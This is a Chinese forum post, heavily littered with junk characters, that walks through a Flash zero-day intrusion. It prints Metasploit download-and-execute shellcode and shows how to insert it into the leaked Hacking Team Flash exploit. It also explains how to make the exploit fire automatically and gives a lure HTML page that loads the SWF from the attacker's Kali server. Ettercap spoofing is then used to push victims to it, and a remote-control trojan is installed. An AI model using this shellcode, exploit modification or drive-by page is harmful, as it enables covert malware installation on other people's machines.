|
( G$ o9 T, [5 m& K
三、flash 0day之手工代码修改制作下载者实例入侵演示 $ m; N4 j6 K4 R1 p6 f" }' C
( L9 R0 [1 O4 ^
- L' D# W# P& ~7 c1 {9 k 利用到的工具:
/ ?2 D* ]9 d/ M. J2 z
0 B0 ~$ b$ S- @5 s3 K
. K D# t! M0 k3 }6 G ~ Msf 6 ^9 _8 n4 ~1 Y; n
; a2 {/ i2 n6 B, c0 \2 n" e2 M4 Y) Q( o& Y, P! T, ?
Ettercap
0 y! E9 s1 E( u; M
7 l, z+ Y2 q& N8 ~9 E' \ R' d7 k; ?$ ~7 Z* Y) j
Adobe Flash CS6
/ r) d% e% @4 U9 |% C
0 @2 Z& L! Y! N/ s( o2 P3 \! s# X" g! F( o* a6 u8 I1 r
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 0 d# I5 r% S; L) W& e
0 B0 b- P+ a8 r }
" _: l2 ?9 F Y8 m/ q% D 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
1 O( D+ y+ t7 C; V* k' S
0 z" W2 o1 Y# l& X) k& t& ]: X; y. W# J) g& ~4 h
如图:
2 w, _& N& A+ |
& s2 N( Z5 D$ V/ e6 Q7 N1 @" D F1 ]. c5 n
2 d. m1 ^/ S; Y% ^% L' b6 O
' E5 F: L5 R% E; W; P
7 q% z0 d/ g& o& ^  3 s7 X& F; z M' K8 j- x
) l! [4 K! |, } e5 P5 T
$ \+ S* V1 q- K
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 7 b/ C- n* Z& O& F- C
6 x; R0 A" G$ T7 w; N# s
3 ^8 x6 z3 t* x0 I6 ?
! G8 l& g: V, w
$ P' n' e. y0 ]. b: D# g: K$ B
8 B } S# a6 C  / V; h' \% e* R1 E# }9 |2 H* c
3 N/ b5 u; b- X9 F& y2 d8 u6 H0 ?+ k8 H4 S3 z
然后执行generate -t dword生成shellcode,如下:
. u5 _9 P. H( I$ | 7 ^1 k2 h) N( v. t5 S* u3 ~
; k$ c8 B5 a. A1 c 
* g2 x1 B, D- X4 u/ v
+ u) b+ ~( U! b% G/ Q' M, K; n! `! u8 c- Z
复制代码到文本下便于我们一会编辑flash exp,如下: . b, b' J- A9 q0 i4 I( y) k6 ^
* ^' I4 Y4 e6 W6 D
6 V: G: d* ?7 U* w, k, n+ c 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
# Y+ ` l) t4 d* t
! P$ B! h: L4 v. a
8 c! {$ H. N1 O( z4 c! F6 y 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " @* E6 B, S+ Y7 [2 |' {
& l S/ i( Z; Z* l
L' }- \7 L& x6 C! {: K1 g
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
7 P ^1 g1 J8 k* @3 [2 N# w$ x
- O$ Q$ U9 }8 `8 B- N' `
' O0 \9 Z& o w 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
& _) z* i! b1 v% Y5 s1 n
; W$ z1 _! p/ s4 G4 b& \# m) V' R) B+ S" \
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
7 M4 E+ i1 s- i4 }* o( k0 j3 ` 4 o4 r5 f. a" H$ {5 F3 b$ W
8 O7 y0 A% t6 ]( A% N( H
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
. I$ x4 p0 K7 H; A
4 U( q3 P( D( w2 F3 e6 ? a% a" p$ X
8 u; x% K( z, G5 Q: } 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
5 r9 I" L& s+ e
- T9 @% s- c% i, I
5 U* q9 ~) N& r( e* [9 | 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
) ?# F" v- S9 j5 X! r! c) h
, M7 ]4 G8 Q0 u3 x1 b J* E
+ z4 e0 R/ v# E2 |$ h1 x 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - `: S) _- x4 Y2 m. O7 D/ q
1 u5 n+ ~7 c( J* [9 ^# ]' }4 T5 G" t# _2 M& }
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & c: F0 y6 j9 v \
0 E# q1 T1 h* |' e% Q0 p
* j- y( d3 |. U* }8 e 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
9 ~- T8 q4 A- t1 X! f) J 6 p4 l% x: ~( l+ b) u6 c# d$ m g! m. G
3 v( l4 }' U2 _" u% y& K7 i$ |1 I 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' ^' r4 \6 U5 C9 U3 T& ]
$ _! f P8 n5 {
$ k9 r2 [7 F- _ z% @( a! i 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
: v% U3 B; \4 W
: z0 O9 ]7 B. V8 A: ?* y+ O. m( }, {4 h& S$ z
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 C: x3 {" ^& O0 t) {4 o, x
( r0 `' L' e+ ^
& h5 `- `3 ?1 g; z& N
( _! D2 X' \) f) z- } 6 ]5 k) \4 L* j, n
' C5 Y' X" @0 _% O" R7 r8 ?7 ^2 {
' |8 X3 J" w7 V0 } r% n& s5 j: J' z
; H$ Y' z6 U( L* | 下面我们来修改flash 0day exp,需要修改三个文件,分别为: % t* P# O' Z9 o
* h% A+ d1 s3 r. G. p3 r* p0 d9 [& S1 ^2 R, D
! P N8 t3 h; g* W2 H9 T 2 q+ t( G9 X$ m2 k
* V" _! h5 X/ F7 u
先修改ShellWin32.as,部分源代码如图:
# C* p \# K! F( O
8 R- B+ h; f4 k- [
0 M+ v k! W0 n9 U s  2 A6 m6 y) ^ S- k3 v4 Y
, C* ]* |4 S% G) D# \2 f$ X
2 `- ]( u& f1 U6 ^6 V. r 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 q, f" I3 q7 S, l+ ^8 _- S, h+ k& Z
, i. L2 j1 V/ i5 `( ^! V; ?0 D9 W9 f( g' X: t% H5 B* w
1 H1 m: @: O7 a, i. z' i/ h
9 t7 K5 k) j' l: l
2 G# J. ~9 ]) Z8 Z5 Z 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : H% E4 M9 k) l" i; F; g
1 d: E6 s4 t8 T/ W, Q
! E/ J/ K2 D4 b* B; @
 ! @6 u- }! l& d" b
/ g/ w8 M$ s6 ^' u% m/ F1 t8 I0 d% P
$ v' @- ]! [( J6 I! r8 j3 C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 l% f4 V K! d& t) D2 B
8 t3 i) `3 F# h9 Z4 r
+ E3 K: D; g; d- L( L
1 B1 i9 `2 {) v0 }" Q( j/ L6 H
7 k1 N7 n9 g& R
" }7 k2 M! v3 _# k- T1 K1 V- G ' K: P" ~7 T7 W1 S
$ }) X" r8 h3 f/ m4 h# J% w6 d1 a3 I1 P8 \' g
5 z8 S, m) _) G1 U7 [" E! W. c + o7 X( J" z8 ?; m
% n% x$ r9 ^3 L 然后点保存,下面我们来编译一下,打开
. w: o5 S, U. Q& f# ?
) c9 Q) p' h/ _ u* S& ?. n" D! W3 E N' V0 N% g4 D
exp1.fla然后点文件-发布,看看编译没错误 # w4 S! C3 d' U' H
. i; @( _5 R- {1 O- z
1 ^( k' d* p" Q8 ?# ]
1 Y1 Y! i) B6 l# [3 \ - q+ P, ~ T' J( _& N. q6 b$ i
$ b6 @( r3 m. O/ Y9 i! Z
* b0 k( j+ w- v) d+ W : F1 D2 n8 k! G5 v7 N
; r9 v. b- ~; x' { V; J! ~# P4 r( E3 s0 M0 l& f
0 \- u0 ]' q) A
0 l8 z# Z+ |2 ?  " e6 H" m3 C$ l2 S/ @% E4 j
/ x9 H# R2 @1 a# `- A' D0 I
: E: ~' E( ]: b# n- ] 然后我们把生成的
) e6 t# d! Q( f$ p* U
, M$ b, F& N5 h: m
0 t6 m# E7 J! s+ ?+ c exp1.swf丢到kailinux 的/var/www/html下: - n: e" e* x0 e6 C
4 P( f2 I! G. d6 p: H3 s; C( e9 O A, M
然后把这段代码好好编辑一下 ! T! [9 ^. P: z' |. ?0 `( \$ e4 v
* o% ^$ P* T* T0 }8 H* j0 o- M# F" b5 ?& \
) O. X* ~. m5 S2 u/ i. H. h
# `, Q# u9 L# x( _" C" H
3 b$ m' V2 V! F! E 5 |. n& S7 i* o0 L2 ]9 n
8 Q+ g s0 u4 t0 }2 T- h6 A+ h. N
& T0 Z S) M3 t t2 s% R4 l
- U0 T& |: k# x4 m9 |: K1 i! s- L
) Z. w9 Y" D( i) Q8 ?
) {. G. s4 A* C! w3 M6 ^; d
, A2 ^7 Z; C% ]
. o$ _- V1 W$ K3 r9 |- T$ p
) }4 F/ Q( J2 h' X% m( _) r E4 [3 E0 q" x; F+ a, X* L
, p) h, x: B# { x/ y" t1 x9 H: A3 M- [1 N: N0 s7 i {' l4 r
' m" `4 Q0 Y0 m; B3 @8 N8 l7 p
2 S3 H8 L3 s/ E5 S; R& @1 H$ S5 f
[' Z. u, [ s5 ?7 j# J3 P4 J <!DOCTYPE html> 9 s+ z+ m' F. ^9 u* {/ v1 v
?+ ~- s" R2 q8 Y7 b
' M, Z8 E1 _, X' [8 Z4 t <html>
; p _* o4 i* Y/ Y$ X 5 U E- r/ ]; z$ l2 |
* k+ L2 S' x1 |: x0 I$ g3 m! H1 I <head>
; O3 I1 u, V& v3 V* s$ T( \
) o* d7 e: ^7 z# t7 E
, r8 ?' `" l' l- k: O% `7 ] <meta http-equiv="Content-Type" content="text/html;
( {1 R+ S4 P/ ~! W1 l' f$ l' c : Y! D* s7 w( F. p" d
3 T: V0 U# K# [' D! A6 Z( ~1 |1 ^
charset=utf-8"/> + { q: r/ R9 ~7 ^5 b2 Z
1 H# k# R- b% ?; C+ X0 b
I3 l* O. y7 R1 D </head> . W3 }' | f. ~; P* l4 n
9 y& l7 t j" z) \* @
4 a0 w% ?* D [$ n' j) Q# m: D- }8 B
<body>
) k v3 A: m% N% M
7 N9 d8 z# v: S1 Q. B" e0 M# D3 S( [. J6 o O
<h2> Please wait, the requested page is loading...</h2>
% J6 m$ ]( L+ _' f7 T( \ " E; v H4 a0 t" v# u& ]
! j6 A; x' l3 G! R% h; q) f5 L3 h# r; c
<br>
0 ], Y5 ^, K0 z8 N 5 r+ J1 V P/ q- V1 U0 F. v
- ]. R. |/ i8 t9 S1 n$ e# {& o
<OBJECT
6 f; `$ G9 J/ R$ l* W3 j
7 ^# B+ E6 V: `
5 ~9 ~* T8 \# y classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
0 @$ P. V3 H6 r9 ` ; e2 F) q' H8 Q9 U" r0 y
" Y w; z: @5 J VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
o- g; c2 A" Z3 ? 8 g0 B3 d/ i7 ?5 c- B& h
0 I& i) n% L- Z; F+ Z </body>
! U' r. T# F. ]% l 8 V( ~4 ~; A7 E) P. W
9 b* a& W1 U$ X+ b, y9 ]4 V6 s <script>
r9 I% v' K% p/ P& n) p& Y$ N
6 k8 i% |9 {7 t. Z
, h7 n# H: f3 B7 d9 k8 a- j7 ` setTimeout(function () { 0 L/ I t/ f! F y& C3 t
9 n8 g3 g6 ?- E
# N+ F, q/ {" E( R" H0 J( A
) Q, P# s+ \/ M) {
+ Z9 D3 q5 j, z# _+ L: C8 o+ S9 z7 L5 d$ C N1 w8 k/ n; l
window.location.reload(); - O6 P3 ]4 q0 O3 D2 R/ V+ f
( X- _6 u6 ~! N* s+ u; T
" X7 x z) E, ~' x
}, 10000);
. O) E: F, c. Y3 _6 _0 ^: `% `
! s6 n4 g+ D6 R: j. U! g9 \* Y, J- b" Y" f# W) {: z% {1 n/ [/ j3 D6 z! M- h
. O- s7 \/ t6 Y ; u4 v4 ?& v; M
1 i5 q! D5 x& Y/ S </script>
1 `- Q+ B3 G# Y9 W) T1 U. L( n 8 H, C( H0 L8 d$ j9 x" x. w
# @5 c% N: ~$ U# R </html> " N% H. \ A" U
% y j0 G" }' x1 G% B
. ~' l( I) \0 f9 O x# j: L & ?$ l' e" ~+ R6 _ V# c. r" }
2 n5 E4 t- L$ h g. S$ Z
" X. F [% J o" k7 A5 T- u 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
! C8 F" }2 q" {! ^5 S, s4 X / M6 ?: M; Q. Z/ [: Y9 l$ k; J1 U
- i3 z1 ^' ~ W; I! R- ?. m 
7 ]6 Y, m! F( \, E # D" J. E5 i: d& s- ]
1 j& g5 ]( O; T- h * x2 l1 y2 y$ R2 L
2 Z5 z* \( ?+ w% o5 e" [* N/ T
2 Q& `7 t! j, Z" ~# l( `# _7 i0 ~ 6 Z* S I9 C, K+ N
% n# B: N& M/ ?, B( j B
U M4 F0 H4 a/ @& R' L
, l& F) R8 Y' `6 C
. d1 }+ `- [4 H9 B1 |" c- X0 {: f7 u
& _' T' o5 Y/ f+ M : ^( n: Y9 g- C
( T6 [- ^9 \) B 下面我们用ettercap欺骗如图:
* i2 I! A2 X( _ , S! f) j' J, _( a3 `% l9 _6 l
& R& g2 f- ~, V8 S& I
7 J+ b/ T/ Y! ]
8 M$ S) K. T0 W4 H# K1 ]# u' O$ d% j
D4 S+ s: o E4 M3 s' D+ z1 ?0 ?" y
G a1 U+ @. w. _) ?( w
+ Y1 g! Z! n0 W8 y 下面我们随便访问个网站看看: ! B+ L, h' `) D @; O' z: O
" X9 Y3 `" S1 q% \
1 @8 ~" {7 ^: _1 F2 N& R9 K 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: / N0 ]$ Z* a- a; l8 P) t2 d7 a* ^
$ O5 H5 _# I; X7 k. W0 x8 l
& T3 R2 C5 L+ x% q  0 w- [* ^3 K$ ~& y; i& X
+ U0 ~, S$ f$ T _( _: J; U
6 Y* a( Y; v& |) `* n L/ O: {
我们看另一台,
" {7 [& f' O( k, R( ~ 4 T+ D; ^" g. v* m" F* y( c% T" H
2 s& b9 Z3 G- y3 N+ r
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ; m) B: j. x& R- n- \
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对